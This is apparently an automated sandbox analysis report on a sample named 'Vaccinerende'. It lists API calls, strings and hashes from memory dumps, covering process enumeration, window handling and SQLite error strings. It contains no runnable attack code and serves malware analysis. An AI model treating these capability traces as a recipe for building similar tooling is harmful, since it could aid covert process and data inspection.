  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
APIs
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                              • String ID: A
                                                                              • API String ID: 2892645895-3554254475
                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                              APIs
                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                              • memset.MSVCRT ref: 0040DA23
                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                              • String ID: caption
                                                                              • API String ID: 973020956-4135340389
                                                                              • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                              • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                              APIs
                                                                              Strings
                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                              • API String ID: 1283228442-2366825230
                                                                              • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                              • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                              APIs
                                                                              • wcschr.MSVCRT ref: 00413972
                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                              • memset.MSVCRT ref: 004139B8
                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                              • memset.MSVCRT ref: 00413A00
                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                              • String ID: \systemroot
                                                                              • API String ID: 4173585201-1821301763
                                                                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy
                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                              • API String ID: 1284135714-318151290
                                                                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                              • String ID: 0$6
                                                                              • API String ID: 4066108131-3849865405
                                                                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004082EF
                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • memset.MSVCRT ref: 00408362
                                                                              • memset.MSVCRT ref: 00408377
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 290601579-0
                                                                              • Opcode ID: 6f0692b1ad47d209bd08c5194d00cfda551af10c8340107b95c049cf77cc9a6b
                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                              • Opcode Fuzzy Hash: 6f0692b1ad47d209bd08c5194d00cfda551af10c8340107b95c049cf77cc9a6b
                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                              APIs
                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                              • memset.MSVCRT ref: 0044505E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$memchrmemset
                                                                              • String ID: PD$PD
                                                                              • API String ID: 1581201632-2312785699
                                                                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                              • String ID:
                                                                              • API String ID: 2163313125-0
                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free$wcslen
                                                                              • String ID:
                                                                              • API String ID: 3592753638-3916222277
                                                                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                              APIs
                                                                              • memset.MSVCRT ref: 0040A47B
                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                              • String ID: %s (%s)$YV@
                                                                              • API String ID: 3979103747-598926743
                                                                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                              • String ID: Unknown Error$netmsg.dll
                                                                              • API String ID: 2767993716-572158859
                                                                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                              APIs
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                              • API String ID: 3176057301-2039793938
                                                                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                              APIs
                                                                              Strings
                                                                              • database is already attached, xrefs: 0042F721
                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                              • out of memory, xrefs: 0042F865
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpymemset
                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                              • API String ID: 1297977491-2001300268
                                                                              • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                              • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
